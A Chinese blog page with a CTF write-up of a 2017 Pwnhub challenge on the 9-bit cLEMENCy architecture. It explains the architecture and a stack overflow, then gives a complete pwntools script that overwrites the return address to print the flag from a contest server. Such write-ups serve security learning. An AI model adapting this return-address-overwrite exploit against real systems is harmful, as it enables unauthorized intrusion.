<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="我们的征途是星辰大海">
  <meta name="keyword" content="hexo-theme, vuejs">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      Pwnhub 线下沙龙CTF之cLEMENCy题解 | 星博‘s
    
  </title>
  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/plugins/gitment.css">
  <script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdn.bootcss.com/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>
  <script src="/js/qrious.js"></script>
<script src="/js/gitment.js"></script>
</head>
<div class="wechat-share">
  <img src="/css/images/logo.png" />
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>星博‘s</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">Home</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">Tags</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">Archives</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">About</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">Home</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">Tags</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">Archives</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">About</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2>Pwnhub 线下沙龙CTF之cLEMENCy题解</h2>
  <p class="post-date">2017-08-14</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><p>8月12日Pwnhub第一次沙龙，心想到要和一众大佬面基，心情异常激动，于是攥着讨来的邀请函，冒着12级大雨，满心欢喜的赶到了五环的小别墅~</p>
<p>上午的议题干货满满，有冠城大佬，360小姐姐和青博学弟flyyy的分享，中午的<strong>烧烤 + 德州扑克</strong>之后便是Pwnhub的经典项目CTF，其中Explorer大佬出了一道<code>cLEMENCy</code>架构的题目。</p>
<p>提到<code>cLEMENCy</code>就不得不提到刚过去的<code>Defcon 25 Final</code>。与去年的CGC不同，<code>Defcon Final</code>今年的规则是，主办方与比赛前一天24小时放出自定义架构，以及相应的<code>emulator</code>，留给参赛者24小时的准备时间。这样一来，所有的参赛队都站在了同一起跑线上，需要从0准备所有的工具。</p>
<h2 id="0x01-简介：9bit的奇怪架构"><a href="#0x01-简介：9bit的奇怪架构" class="headerlink" title="0x01 简介：9bit的奇怪架构"></a>0x01 简介：9bit的奇怪架构</h2><p><code>cLEMENCy（the LEgitbs Middle ENdian Computer architecture）</code>由LBS的lighting等大佬们设计。<code>cLEMENCy</code>的指令手册中给出了架构的所有细节。简单的总结如下：</p>
<ol>
<li><p>每字节由9bit组成；使用混合序存储，Register XXYYZZ → Memory YYXXZZ，Register XXYY → Memory YYXX</p>
<blockquote>
<p>“Each byte is 9 bits of data, bit 0 is the left most significant bit. Middle-Endian data stores bits 9 to 17, followed by bits 0 to 8, then bits 18 to 27 in memory when handling three bytes. Two bytes of data will have bits 9-17 then bits 0 to 8 written to memory.”</p>
</blockquote>
</li>
<li><p>内存布局：如下图所示。漏洞利用的目标即把Flag页面开始的一段内存，即flag打印出来。所以说只需要任意地址读就可以了。</p>
<p> <img src="https://ws3.sinaimg.cn/large/006tNc79gy1fija68reuoj310y0hkn1b.jpg" alt=""></p>
</li>
<li><p>指令集：cLEMENCy是RISC，不过最长54bit，指令集和arm有点类似；</p>
</li>
<li><p>寄存器：共31个寄存器，<code>R0</code>一般用于<code>param 1</code>和<code>ret value</code>，<code>ST</code>表示栈，<code>RA</code>表示返回地址。</p>
</li>
<li><p>栈调用：栈有两个增长方向；对栈的操作往往通过<code>STT(Store Tri)</code>指令实现。<code>STTm</code>指令有三种，其中0，1，2分别表示内容存入memory之后<code>rB</code>操作数是增加还是减少，从而表示栈的增长方向。</p>
</li>
</ol>
<p>除此之外，比赛中使用的bianry使用了<code>neatlibc</code>，但为了方便模拟器对io和内存管理进行了一些修改。</p>
<h2 id="0x02-漏洞利用：Ret2Put"><a href="#0x02-漏洞利用：Ret2Put" class="headerlink" title="0x02 漏洞利用：Ret2Put"></a>0x02 漏洞利用：Ret2Put</h2><p>既然是2个小时的CTF，大佬们出题肯定是放足了水233。用IDA大概分析一下，可以发现这是一个简单的伪<code>&quot;Base64&quot;</code>。</p>
<p><img src="https://ws3.sinaimg.cn/large/006tNc79gy1fijbgetydzj312w0ocdoa.jpg" alt=""></p>
<blockquote>
<p>这里用的是<code>Tea Deliverers</code>在比赛时使用的<code>IDA Processor</code>（膜LYM和Explorer和GYC等大佬）。PPP在赛后也放出了他们比赛时使用的<a href="https://github.com/pwning/defcon25-public" target="_blank" rel="external">Utils</a>。</p>
</blockquote>
<p>其中主要的函数<code>read_string</code>:输入一个9bit表示的字符串（交互也全部都是基于9bit），之后会以三字节为单位，转成以三字节为单位的值。如<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&apos;AAA\n&apos; -&gt; 0010101</div></pre></td></tr></table></figure></p>
<p>在调用这个函数时，传入的len过长，于是可以溢出上一个函数的返回地址，因此我们可以直接<code>Ret2put</code>，即修改返回地址和参数为<code>Put</code>函数和<code>flag page</code>的地址，即可打印出flag。</p>
<p>观察main_func返回处，<code>LDT R28-RA, [R28 + 0]</code>将R28, ST, RA三个寄存器赋值，是可控的，而puts的参数R0也通过<code>ad. R0, R28, R27</code>控制。</p>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fijbr5ncb1j30kx0euq7p.jpg" alt=""></p>
<p>于是构造对应值即可。</p>
<p><img src="https://ws3.sinaimg.cn/large/006tNc79gy1fijc2pzv9uj30iq068gnz.jpg" alt=""></p>
<p>还有一点是，ST要填上一个合法值，否则<code>puts</code>时会<code>crash</code>。但是程序是没有随机化的，所以每次运行都一样。这也导致了比赛时”抄作业(直接重放)”异常方便233</p>
<p>最终代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div></pre></td><td class="code"><pre><div class="line">from pwn import *</div><div class="line">import string</div><div class="line"></div><div class="line">def p27(bit24):</div><div class="line">    r = bin(bit24)[2:].rjust(27, &apos;0&apos;)</div><div class="line">    r = r[9:18] + r[0:9] + r[18:27]</div><div class="line">    return r</div><div class="line"></div><div class="line"></div><div class="line">def sb8tosb9(payload):</div><div class="line">    stream = &apos;&apos;.join(bin(ord(x))[2:].rjust(9, &apos;0&apos;) for x in payload)</div><div class="line">    pad = len(stream) % 8</div><div class="line">    if pad != 0:</div><div class="line">        length = len(stream) + (8 - pad)</div><div class="line">    else:</div><div class="line">        length = len(stream)</div><div class="line">    stream = stream.ljust(length, &apos;0&apos;)</div><div class="line">    payload9 = &apos;&apos;.join(</div><div class="line">        chr(int(stream[i:i + 8], 2)) for i in range(0, len(stream), 8))</div><div class="line">    return payload9</div><div class="line"></div><div class="line">def sb9tosb8(payload):</div><div class="line">    stream = &apos;&apos;.join(bin(ord(x))[2:].rjust(8, &apos;0&apos;) for x in payload)</div><div class="line">    length = (len(stream) / 9) * 9</div><div class="line">    stream = stream[:length]</div><div class="line">    return &apos;&apos;.join(</div><div class="line">        chr(int(stream[i:i + 9], 2)) for i in range(0, len(stream), 9))</div><div class="line"></div><div class="line">alphabet = &apos;&apos;</div><div class="line">for i in range(26):</div><div class="line">    alphabet += (chr(i + ord(&apos;A&apos;)))</div><div class="line">for i in range(26):</div><div class="line">    alphabet += (chr(i + ord(&apos;a&apos;)))</div><div class="line">for i in range(10):</div><div class="line">    alphabet += (chr(i + ord(&apos;0&apos;)))</div><div class="line">alphabet += &apos;+/&apos;</div><div class="line">def conventer(bit18):</div><div class="line">    res = &apos;&apos;</div><div class="line">    res += alphabet[int(&quot;0b&quot; + bit18[:6],2)]</div><div class="line">    res += alphabet[int(&quot;0b&quot; + bit18[6:12],2)]</div><div class="line">    res += alphabet[int(&quot;0b&quot; + bit18[-6:],2)]</div><div class="line">    return res</div><div class="line"></div><div class="line"></div><div class="line">p = remote(&quot;54.223.103.62&quot;,10000)</div><div class="line">flag_addr = 0x4010000 + 0x21</div><div class="line">pc_addr = 0x645F</div><div class="line">newpld = 11 * p27(0x414141) + p27(flag_addr) + p27(0x3fffbc7) + p27(pc_addr)</div><div class="line">payload = &apos;&apos;</div><div class="line">for i in range(len(newpld) / 18):</div><div class="line">    payload += conventer(newpld[i*18:(i+1)*18])</div><div class="line">p.send(sb8tosb9(payload + &apos;\n&apos;))</div><div class="line">p.recvn(0x2d)</div><div class="line">data = sb9tosb8(p.recvall(timeout = 1))</div><div class="line">print data</div></pre></td></tr></table></figure>
<p><img src="https://ws2.sinaimg.cn/large/006tNc79gy1fijbzy7fl3j30c7014t91.jpg" alt=""></p>
</section>
    <!-- Tags START -->
    
      <div class="tags">
        <span>Tags:</span>
        
  <a href="/tags#Pwn" >
    <span class="tag-code">Pwn</span>
  </a>

  <a href="/tags#CTF" >
    <span class="tag-code">CTF</span>
  </a>

      </div>
    
    <!-- Tags END -->
    <!-- 打赏 START -->
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    <div class="qrcode">
      <canvas id="share-qrcode"></canvas>
      <p class="notice">扫描二维码，分享此文章</p>
    </div>
    <!-- 二维码 END -->
    
      <!-- UY START -->
      <div id="uyan_frame"></div>
      <script type="text/javascript" src="http://v2.uyan.cc/code/uyan.js"></script>
      <!-- UY END -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-简介：9bit的奇怪架构"><span class="toc-nav-text">0x01 简介：9bit的奇怪架构</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-漏洞利用：Ret2Put"><span class="toc-nav-text">0x02 漏洞利用：Ret2Put</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://windcarp.github.io/2017/08/14/Writeup/';
    var banner = 'undefined'
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

     // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()
        
        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })

    // qrcode
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });

    // gitment
    var gitmentConfig = "undefined";
    if (gitmentConfig !== 'undefined') {
      var gitment = new Gitment({
        id: "Pwnhub 线下沙龙CTF之cLEMENCy题解",
        owner: "undefined",
        repo: "undefined",
        oauth: {
          client_id: "undefined",
          client_secret: "undefined"
        },
        theme: {
          render(state, instance) {
            const container = document.createElement('div')
            container.lang = "en-US"
            container.className = 'gitment-container gitment-root-container'
            container.appendChild(instance.renderHeader(state, instance))
            container.appendChild(instance.renderEditor(state, instance))
            container.appendChild(instance.renderComments(state, instance))
            container.appendChild(instance.renderFooter(state, instance))
            return container;
          }
        }
      })
      gitment.render(document.getElementById('comments'))
    }
  })();
</script>

    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2018 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine == 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>